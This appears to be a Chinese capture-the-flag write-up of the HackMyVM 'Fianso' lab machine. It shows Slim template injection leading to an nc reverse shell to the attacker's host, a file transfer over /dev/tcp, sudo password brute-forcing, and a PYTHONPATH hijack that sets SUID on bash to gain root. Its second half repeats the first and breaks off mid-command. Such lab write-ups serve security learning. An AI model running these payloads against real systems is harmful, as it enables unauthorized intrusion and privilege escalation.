![\"image-20240710135425283\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408061208844.png\")
<\/div>\n
![\"image-20240806100714207\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408061208846.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 172.20.10.4:22\nOpen 172.20.10.4:8000\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n| 3072 ee:71:f4:ad:a0:71:e1:35:19:86:ab:c8:e6:be:36:17 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7WSYGSeML+7fdCGSg\/SceCebE64ubFkH1Lz8A+lQ0AVyfX53bRJd5tLTsioGIktkCOADunR5OnBVsYENJELoRyLBIKVOUM47PZezmL5YMTqsfmkLlrvxmxh1qIePM4BWN41WtRVj5UeVJbonyfg+XSYcOSvexW0ecjgVsZF+3L+oGHY\/HVN6hVjbYCcgzjagL0+yjUUcsqsZiKJTRAwKDW\/0KTzNpl6DR3+V\/kI9IqtMVv1b5HiGEVGDfFG43aKBCCYN6Z5UJ9LQxzn1ek5qm+itm2HBRsx1gyP5090iWq7JaienHNu+SF5INC+0gONeDNQbGe2DmFOP4DmRVN2xab6yOtad8RUeuXV9Ai34oQ5C5Sb05359r7hIiUbmW8HUdyno0MJWzD3qMaI4vjzu8LjHBFgLLr46W85kUfGe4UNRw5oyny06dSykdlUbr5UqNqhXy0BJJ+IVAjuGRK+GJp2rG50+XtiNAl+QVmXiMPN3ZrnDH+NFNAPxx1XVulJc=\n| 256 40:1c:c3:da:83:d7:2f:60:cb:12:47:3b:02:67:04:14 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCp+K99CwZe+fU+TRLU\/qS7AhRI9WH4O\/ZvweFt5WrggQF7uNqBi\/CsuNuz7ZyuQhqKLY8ksBNK4Sl0zhvvuRjA=\n| 256 1a:69:a7:f9:dc:a5:49:ff:d2:7d:ce:45:97:6d:8a:b9 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPnpl12UICtoiToIfyj1uu5B6BjKmFcThog0q8T36RAr\n8000\/tcp open http syn-ack WEBrick httpd 1.6.1 (Ruby 2.7.4 (2021-07-07))\n| http-methods: \n|_ Supported Methods: GET HEAD POST\n|_http-server-header: WEBrick\/1.6.1 (Ruby\/2.7.4\/2021-07-07)\n|_http-title: Site doesn't have a title (text\/html;charset=utf-8).\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP:8000 -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n^C\n[!] Keyboard interrupt detected, terminating.<\/code><\/pre>\n\u61d2\u5f97\u626b\u4e86\uff0c\u7b49\u4e0b\u6ca1\u60f3\u6cd5\u518d\u626b\u5427\u3002\u3002\u3002<\/p>\n
\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ curl http:\/\/$IP:8000 \n<!DOCTYPE html><html><body><form action="" method="post"><First>Name:<br><br><\/First><input type="text" name="name" value=""><input type="submit" value="Submit"><\/form><h2>Hello !<\/h2><\/body><\/html>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ whatweb http:\/\/$IP:8000\nhttp:\/\/172.20.10.4:8000 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[WEBrick\/1.6.1 (Ruby\/2.7.4\/2021-07-07)], IP[172.20.10.4], Ruby[2.7.4,WEBrick\/1.6.1], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block]<\/code><\/pre>\n![\"image-20240806101546276\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\nSSTI<\/h3>\n
\u611f\u89c9\u50cf\u662f\u67d0\u79cd\u6a21\u677f\u6ce8\u5165\u8fdb\u884c\u6d4b\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ tinja url -u "http:\/\/$IP:8000\/" -d "name=abc" \nTInjA v1.1.3 started at 2024-08-05_22-31-59\n\nAnalyzing URL(1\/1): http:\/\/172.20.10.4:8000\/\n===============================================================\nStatus code 200\nAnalyzing post parameter name => abc\n[*] Value AXML6ULPJ5KXI5EX of POST parameter name is being reflected 1 time(s) in the response body\n\n[!] The polyglot <%'${{\/#{@}}%>{{ triggered an error: Status Code 500\n[*] The polyglot p ">[[${{1}}]] returned the response(s) [unmodified]\n[!] The polyglot <%=1%>@*#{1} was rendered in a modified way: [<%=1%>@*1]\n[*] The polyglot <%=1%>@*#{1} returned the response(s) [<%=1%>@*1]\n[*] The polyglot {##}\/*{{.}}*\/ returned the response(s) [unmodified]\n\nA template injection was detected and the template engine is now being identified.\n[*] The polyglot a">##[[${1}]] returned the response(s) [unmodified]\n[*] The polyglot \/\/*<!--{##<%=1%>{{!--{{1}}--}}-->*\/#} returned the response(s) [unmodified]\n\nVerifying the template injection by issuing template expressions tailored to the specific template engine.\n[*] Verifying Slim.\n[*] The polyglot #{ 7*7 } returned the response(s) [49]\n[+] Slim was identified (certainty: Very High)\n\n===============================================================\n\nSuccessfully finished the scan\n[+] Suspected template injections: 1\n[+] 1 Very High, 0 High, 0 Medium, 0 Low, 0 Very Low certainty\n\nDuration: 551.585857ms\nAverage polyglots sent per user input: 6\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ curl -s "http:\/\/$IP:8000\/" -d "name=#{ 7*7 }" | html2text\nName:\n[name ][Submit]\n***** Hello 49 ! *****<\/code><\/pre>\n\u7136\u540e\u53c2\u8003\uff1a<\/p>\n
\nhttps:\/\/book.hacktricks.xyz\/pentesting-web\/ssti-server-side-template-injection#slim-ruby<\/a><\/p>\n<\/blockquote>\n\u8fdb\u4e00\u6b65\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
#{ %x|env| }\nHello HOME=\/home\/sofiane LOGNAME=sofiane PATH=\/usr\/bin:\/bin LANG=en_US.UTF-8 SHELL=\/bin\/sh PWD=\/home\/sofiane !<\/code><\/pre>\n\u53d1\u73b0\u53ef\u4ee5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u8fdb\u884c\u53cd\u5f39shell\uff01<\/p>\n
#{ %x|whoami;id| }\nHello sofiane uid=1001(sofiane) gid=1001(sofiane) groups=1001(sofiane) !\n\n#{ %x|nc -e \/bin\/bash 172.20.10.8 1234| }<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) sofiane@fianso:\/home\/sofiane$ ls -la\ntotal 36\ndrwxr-xr-x 4 sofiane sofiane 4096 Dec 24 2022 .\ndrwxr-xr-x 3 root root 4096 Dec 13 2022 ..\nlrwxrwxrwx 1 root root 9 Dec 13 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 sofiane sofiane 220 Dec 13 2022 .bash_logout\n-rw-r--r-- 1 sofiane sofiane 3526 Dec 13 2022 .bashrc\ndrwxr-xr-x 3 sofiane sofiane 4096 Dec 21 2022 .config\ndrwxr-xr-x 3 sofiane sofiane 4096 Dec 18 2022 .local\n-rw-r--r-- 1 sofiane sofiane 807 Dec 13 2022 .profile\n-rwx------ 1 sofiane sofiane 33 Dec 24 2022 user.txt\n-rw------- 1 sofiane sofiane 52 Dec 24 2022 .Xauthority\n(remote) sofiane@fianso:\/home\/sofiane$ cat user.txt \ndd61014e5d119683f9fc798439cd3916\n(remote) sofiane@fianso:\/home\/sofiane$ sudo -l\nMatching Defaults entries for sofiane on fianso:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sofiane may run the following commands on fianso:\n (ALL : ALL) NOPASSWD: \/bin\/bash \/opt\/harness\n(remote) sofiane@fianso:\/home\/sofiane$ cat \/opt\/harness\n#! \/bin\/bash\n\nclear -x\npass=$(<\/opt\/passwordBox\/password)\ninfo="$(hostname):$(whoami):$pass" \nconf=\/opt\/config.conf\n\n#touch & chmod & echo instead echo & chmod for race condition protection from user. \ntouch $conf\nchmod 700 $conf\necho $info > $conf\n\necho -e "\\nAuthentication to manage music collection.\\n"\necho -e "\\n$(date "+Date: %D")\\nUser: ${info:7:4}\\nHost: ${info%%:*}\\n"\n\nread -ep "Master's password: " passInput\nif [[ $passInput == $pass ]] ; then \necho "sofiane ALL=(ALL:ALL) NOPASSWD:SETENV: \/usr\/bin\/beet " >> \/etc\/sudoers \necho -e "Sudo rights granted !\\n"\nelse\necho -e "Wrong password\\n" && exit 1\nfi\n(remote) sofiane@fianso:\/home\/sofiane$ file \/usr\/bin\/beet\n\/usr\/bin\/beet: symbolic link to ..\/share\/beets\/beet<\/code><\/pre>\n\u7206\u7834\u5bc6\u7801<\/h3>\n
\u5c1d\u8bd5\u8fdb\u884c\u8fd0\u884c\uff0c\u53d1\u73b0\u751f\u6210\u4e86\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n
(remote) sofiane@fianso:\/home\/sofiane$ sudo \/bin\/bash \/opt\/harness\nAuthentication to manage music collection.\n\nDate: 08\/06\/24\nUser: root\nHost: fianso\n\nMaster's password:\n(remote) sofiane@fianso:\/home\/sofiane$ ls -la \/opt\/passwordBox\/password\nls: cannot access '\/opt\/passwordBox\/password': Permission denied\n(remote) sofiane@fianso:\/home\/sofiane$ ls -la \/opt\/config.conf\n-rwx------ 1 root root 43 Aug 6 04:54 \/opt\/config.conf<\/code><\/pre>\n\u5c31\u662f\u8bf4\u5bc6\u7801\u4e0d\u5bf9\uff0c\u914d\u7f6e\u6587\u4ef6\u4e00\u517143\u4e2a\u5b57\u8282\uff0c\u5176\u4e2d\u524d\u9762\u768412\u4e2a\u5b57\u8282\u4e3a\u56fa\u5b9a\u5b57\u8282\uff1afianso:root:<\/code>\uff0c\u518d\u52a0\u4e0aecho\u7684\u7279\u5f81\uff1a<\/p>\n\necho<\/code>\u8f93\u51fa\u4e1c\u897f\u81ea\u5e26\u6362\u884c\u7b26\uff0c\u6dfb\u52a0-n<\/code>\u9009\u9879\u4e0d\u5e26\u6362\u884c\u7b26\u3002<\/p>\n<\/blockquote>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ echo "test" > test1 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ echo -n "test" > test2\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ ls -la test1 test2 \n-rw-r--r-- 1 kali kali 5 Aug 5 23:30 test1\n-rw-r--r-- 1 kali kali 4 Aug 5 23:30 test2<\/code><\/pre>\n\u8fd9\u6837\u7684\u8bdd\u5c31\u670913\u4e2a\u5b57\u8282\u4e86\uff0c\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b30\u4e2a\u5b57\u7b26\u7684\u5f31\u5bc6\u7801\uff0c\u5c1d\u8bd5\u5728rockyou<\/code>\u91cc\u9762\u627e\u4e00\u4e0b\uff1a<\/p>\n# kali\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ grep -E '^.{30}$' \/usr\/share\/wordlists\/rockyou.txt > rockyou_30.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ nc -lp 8888 < rockyou_30.txt \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ ls -la rockyou_30.txt \n-rw-r--r-- 1 kali kali 22109 Aug 5 23:34 rockyou_30.txt<\/code><\/pre>\n# fianso\n(remote) sofiane@fianso:\/home\/sofiane$ hostname\nfianso\n(remote) sofiane@fianso:\/home\/sofiane$ cd \/tmp\n(remote) sofiane@fianso:\/tmp$ cat < \/dev\/tcp\/172.20.10.8\/8888 > rockyou_30.txt\n^C\n(remote) sofiane@fianso:\/tmp$ ls -la\ntotal 60\ndrwxrwxrwt 9 root root 4096 Aug 6 05:38 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\ndrwxrwxrwt 2 root root 4096 Aug 6 04:05 .font-unix\ndrwxrwxrwt 2 root root 4096 Aug 6 04:05 .ICE-unix\n-rw-r--r-- 1 sofiane sofiane 22109 Aug 6 05:38 rockyou_30.txt\ndrwx------ 3 root root 4096 Aug 6 04:05 systemd-private-f4b7babe36d84f9195cb0c2717feab1d-systemd-logind.service-LU0rnf\ndrwx------ 3 root root 4096 Aug 6 04:05 systemd-private-f4b7babe36d84f9195cb0c2717feab1d-systemd-timesyncd.service-2vutgi\ndrwxrwxrwt 2 root root 4096 Aug 6 04:05 .Test-unix\ndrwxrwxrwt 2 root root 4096 Aug 6 04:05 .X11-unix\ndrwxrwxrwt 2 root root 4096 Aug 6 04:05 .XIM-unix<\/code><\/pre>\n\u7136\u540e\u8fdb\u884c\u7206\u7834\uff0c\u56e0\u4e3a\u6211\u4eec\u53ea\u9700\u8981\u89e6\u53d1\u5c31\u884c\u4e86\uff0c\u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u7206\u7834\uff1a<\/p>\n
(remote) sofiane@fianso:\/tmp$ for i in $(cat .\/rockyou_30.txt); do echo $i | sudo \/bin\/bash \/opt\/harness; done\n.........\n(remote) sofiane@fianso:\/tmp$ sudo -l\nMatching Defaults entries for sofiane on fianso:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sofiane may run the following commands on fianso:\n (ALL : ALL) NOPASSWD: \/bin\/bash \/opt\/harness\n (ALL : ALL) SETENV: NOPASSWD: \/usr\/bin\/beet\n(remote) sofiane@fianso:\/tmp$ cat \/usr\/bin\/beet\n#!\/usr\/bin\/python3\n# EASY-INSTALL-ENTRY-SCRIPT: 'beets==1.4.9','console_scripts','beet'\n__requires__ = 'beets==1.4.9'\nimport re\nimport sys\nfrom pkg_resources import load_entry_point\n\nif __name__ == '__main__':\n sys.argv[0] = re.sub(r'(-script\\.pyw?|\\.exe)?$', '', sys.argv[0])\n sys.exit(\n load_entry_point('beets==1.4.9', 'console_scripts', 'beet')()\n )<\/code><\/pre>\n\u52ab\u6301\u73af\u5883\u53d8\u91cf<\/h3>\n
\u56e0\u4e3a\u53ef\u4ee5\u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\uff0c\u6240\u4ee5\u53ef\u4ee5\u5c1d\u8bd5\u52ab\u6301\u5e93\u6587\u4ef6\uff1a<\/p>\n
(remote) sofiane@fianso:\/tmp$ nano sys.py\n(remote) sofiane@fianso:\/tmp$ cat sys.py\nimport os\nos.system("chmod +s \/bin\/bash")\n(remote) sofiane@fianso:\/tmp$ sudo PYTHONPATH=\/tmp\/ \/usr\/bin\/beet\nUsage: \n beet COMMAND [ARGS...]\n beet help COMMAND\n\nOptions:\n --format-item=FORMAT_ITEM\n print with custom format\n --format-album=FORMAT_ALBUM\n print with custom format\n -l LIBRARY, --library=LIBRARY\n library database file to use\n -d DIRECTORY, --directory=DIRECTORY\n destination music directory\n -v, --verbose log more details (use twice for even more)\n -c CONFIG, --config=CONFIG\n path to configuration file\n -h, --help show this help message and exit\n\nCommands:\n config show or edit the user configuration\n fields show fields available for queries and format strings\n help (?) give detailed help on a specific sub-command\n import (imp, im) import new music\n list (ls) query the library\n modify (mod) change metadata fields\n move (mv) move or copy items\n remove (rm) remove matching items from the library\n stats show statistics about the library or a query\n update (upd, up) update the library\n version output version information\n write write tag information to files\n(remote) sofiane@fianso:\/tmp$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Mar 27 2022 \/bin\/bash\n(remote) sofiane@fianso:\/tmp$ nano re.py\n(remote) sofiane@fianso:\/tmp$ sudo PYTHONPATH=\/tmp\/ \/usr\/bin\/beet\nTraceback (most recent call last):\n File "\/usr\/bin\/beet", line 6, in <module>\n from pkg_resources import load_entry_point\n File "\/usr\/lib\/python3\/dist-packages\/pkg_resources\/__init__.py", line 23, in <module>\n import zipfile\n File "\/usr\/lib\/python3.9\/zipfile.py", line 7, in <module>\n import importlib.util\n File "\/usr\/lib\/python3.9\/importlib\/util.py", line 2, in <module>\n from . import abc\n File "\/usr\/lib\/python3.9\/importlib\/abc.py", line 17, in <module>\n from typing import Protocol, runtime_checkable\n File "\/usr\/lib\/python3.9\/typing.py", line 2196, in <module>\n Pattern = _alias(stdlib_re.Pattern, 1)\nAttributeError: module 're' has no attribute 'Pattern'\n(remote) sofiane@fianso:\/tmp$ ls -la \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 Mar 27 2022 \/bin\/bash\n(remote) sofiane@fianso:\/tmp$ bash -p\n(remote) root@fianso:\/tmp# cd ~\n(remote) root@fianso:\/home\/sofiane# whoami;id\nroot\nuid=1001(sofiane) gid=1001(sofiane) euid=0(root) egid=0(root) groups=0(root),1001(sofiane)\n(remote) root@fianso:\/home\/sofiane# cd \/root\n(remote) root@fianso:\/root# ls -la\ntotal 32\ndrwx------ 5 root root 4096 Dec 24 2022 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\nlrwxrwxrwx 1 root root 9 Dec 13 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 602 Dec 21 2022 .bashrc\ndrwxr-xr-x 3 root root 4096 Dec 24 2022 .config\ndrwxr-xr-x 3 root root 4096 Dec 13 2022 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rwx------ 1 root root 33 Dec 24 2022 root.txt\ndrwx------ 2 root root 4096 Dec 24 2022 .ssh<\/code><\/pre>\n\u6210\u529f\uff01<\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV1Hf421f716\/<\/a><\/p>\nhttps:\/\/github.com\/HosseinVampire\/Writeups\/blob\/main\/Hackmyvm\/Machines\/Fianso\/Ctf.md<\/a><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 172.20.10.4:22\nOpen 172.20.10.4:8000\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n| 3072 ee:71:f4:ad:a0:71:e1:35:19:86:ab:c8:e6:be:36:17 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7WSYGSeML+7fdCGSg\/SceCebE64ubFkH1Lz8A+lQ0AVyfX53bRJd5tLTsioGIktkCOADunR5OnBVsYENJELoRyLBIKVOUM47PZezmL5YMTqsfmkLlrvxmxh1qIePM4BWN41WtRVj5UeVJbonyfg+XSYcOSvexW0ecjgVsZF+3L+oGHY\/HVN6hVjbYCcgzjagL0+yjUUcsqsZiKJTRAwKDW\/0KTzNpl6DR3+V\/kI9IqtMVv1b5HiGEVGDfFG43aKBCCYN6Z5UJ9LQxzn1ek5qm+itm2HBRsx1gyP5090iWq7JaienHNu+SF5INC+0gONeDNQbGe2DmFOP4DmRVN2xab6yOtad8RUeuXV9Ai34oQ5C5Sb05359r7hIiUbmW8HUdyno0MJWzD3qMaI4vjzu8LjHBFgLLr46W85kUfGe4UNRw5oyny06dSykdlUbr5UqNqhXy0BJJ+IVAjuGRK+GJp2rG50+XtiNAl+QVmXiMPN3ZrnDH+NFNAPxx1XVulJc=\n| 256 40:1c:c3:da:83:d7:2f:60:cb:12:47:3b:02:67:04:14 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCp+K99CwZe+fU+TRLU\/qS7AhRI9WH4O\/ZvweFt5WrggQF7uNqBi\/CsuNuz7ZyuQhqKLY8ksBNK4Sl0zhvvuRjA=\n| 256 1a:69:a7:f9:dc:a5:49:ff:d2:7d:ce:45:97:6d:8a:b9 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPnpl12UICtoiToIfyj1uu5B6BjKmFcThog0q8T36RAr\n8000\/tcp open http syn-ack WEBrick httpd 1.6.1 (Ruby 2.7.4 (2021-07-07))\n| http-methods: \n|_ Supported Methods: GET HEAD POST\n|_http-server-header: WEBrick\/1.6.1 (Ruby\/2.7.4\/2021-07-07)\n|_http-title: Site doesn't have a title (text\/html;charset=utf-8).\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP:8000 -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n^C\n[!] Keyboard interrupt detected, terminating.<\/code><\/pre>\n\u61d2\u5f97\u626b\u4e86\uff0c\u7b49\u4e0b\u6ca1\u60f3\u6cd5\u518d\u626b\u5427\u3002\u3002\u3002<\/p>\n
\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ curl http:\/\/$IP:8000 \n<!DOCTYPE html><html><body><form action="" method="post"><First>Name:<br><br><\/First><input type="text" name="name" value=""><input type="submit" value="Submit"><\/form><h2>Hello !<\/h2><\/body><\/html>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ whatweb http:\/\/$IP:8000\nhttp:\/\/172.20.10.4:8000 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[WEBrick\/1.6.1 (Ruby\/2.7.4\/2021-07-07)], IP[172.20.10.4], Ruby[2.7.4,WEBrick\/1.6.1], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block]<\/code><\/pre>\n<\/div><\/p>\nSSTI<\/h3>\n
\u611f\u89c9\u50cf\u662f\u67d0\u79cd\u6a21\u677f\u6ce8\u5165\u8fdb\u884c\u6d4b\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ tinja url -u "http:\/\/$IP:8000\/" -d "name=abc" \nTInjA v1.1.3 started at 2024-08-05_22-31-59\n\nAnalyzing URL(1\/1): http:\/\/172.20.10.4:8000\/\n===============================================================\nStatus code 200\nAnalyzing post parameter name => abc\n[*] Value AXML6ULPJ5KXI5EX of POST parameter name is being reflected 1 time(s) in the response body\n\n[!] The polyglot <%'${{\/#{@}}%>{{ triggered an error: Status Code 500\n[*] The polyglot p ">[[${{1}}]] returned the response(s) [unmodified]\n[!] The polyglot <%=1%>@*#{1} was rendered in a modified way: [<%=1%>@*1]\n[*] The polyglot <%=1%>@*#{1} returned the response(s) [<%=1%>@*1]\n[*] The polyglot {##}\/*{{.}}*\/ returned the response(s) [unmodified]\n\nA template injection was detected and the template engine is now being identified.\n[*] The polyglot a">##[[${1}]] returned the response(s) [unmodified]\n[*] The polyglot \/\/*<!--{##<%=1%>{{!--{{1}}--}}-->*\/#} returned the response(s) [unmodified]\n\nVerifying the template injection by issuing template expressions tailored to the specific template engine.\n[*] Verifying Slim.\n[*] The polyglot #{ 7*7 } returned the response(s) [49]\n[+] Slim was identified (certainty: Very High)\n\n===============================================================\n\nSuccessfully finished the scan\n[+] Suspected template injections: 1\n[+] 1 Very High, 0 High, 0 Medium, 0 Low, 0 Very Low certainty\n\nDuration: 551.585857ms\nAverage polyglots sent per user input: 6\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Fianso]\n\u2514\u2500$ curl -s "http:\/\/$IP:8000\/" -d "name=#{ 7*7 }" | html2text\nName:\n[name ][Submit]\n***** Hello 49 ! *****<\/code><\/pre>\n\u7136\u540e\u53c2\u8003\uff1a<\/p>\n
\nhttps:\/\/book.hacktricks.xyz\/pentesting-web\/ssti-server-side-template-injection#slim-ruby<\/a><\/p>\n<\/blockquote>\n\u8fdb\u4e00\u6b65\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
#{ %x|env| }\nHello HOME=\/home\/sofiane LOGNAME=sofiane PATH=\/usr\/bin:\/bin LANG=en_US.UTF-8 SHELL=\/bin\/sh PWD=\/home\/sofiane !<\/code><\/pre>\n\u53d1\u73b0\u53ef\u4ee5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u8fdb\u884c\u53cd\u5f39shell\uff01<\/p>\n
#{ %x|whoami;id| }\nHello sofiane uid=1001(sofiane) gid=1001(sofiane) groups=1001(sofiane) !\n\n#{ %x|nc -e \/bin\/bash 172.20.10.8 1234| }<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) sofiane@fianso:\/home\/sofiane$ ls -la\ntotal 36\ndrwxr-xr-x 4 sofiane sofiane 4096 Dec 24 2022 .\ndrwxr-xr-x 3 root root 4096 Dec 13 2022 ..\nlrwxrwxrwx 1 root root 9 Dec 13 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 sofiane sofiane 220 Dec 13 2022 .bash_logout\n-rw-r--r-- 1 sofiane sofiane 3526 Dec 13 2022 .bashrc\ndrwxr-xr-x 3 sofiane sofiane 4096 Dec 21 2022 .config\ndrwxr-xr-x 3 sofiane sofiane 4096 Dec 18 2022 .local\n-rw-r--r-- 1 sofiane sofiane 807 Dec 13 2022 .profile\n-rwx------ 1 sofiane sofiane 33 Dec 24 2022 user.txt\n-rw------- 1 sofiane sofiane 52 Dec 24 2022 .Xauthority\n(remote) sofiane@fianso:\/home\/sofiane$ cat user.txt \ndd61014e5d119683f9fc798439cd3916\n(remote) sofiane@fianso:\/home\/sofiane$ sudo -l\nMatching Defaults entries for sofiane on fianso:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sofiane may run the following commands on fianso:\n (ALL : ALL) NOPASSWD: \/bin\/bash \/opt\/harness\n(remote) sofiane@fianso:\/home\/sofiane$ cat \/opt\/harness\n#! \/bin\/bash\n\nclear -x\npass=$(<\/opt\/passwordBox\/password)\ninfo="$(hostname):$(whoami):$pass" \nconf=\/opt\/config.conf\n\n#touch & chmod & echo instead echo & chmod for race condition protection from user. \ntouch $conf\nchmod 700 $conf\necho $info > $conf\n\necho -e "\\nAuthentication to manage music collection.\\n"\necho -e "\\n$(date "+Date: %D")\\nUser: ${info:7:4}\\nHost: ${info%%:*}\\n"\n\nread -ep "Master's password: " passInput\nif [[ $passInput == $pass ]] ; then \necho 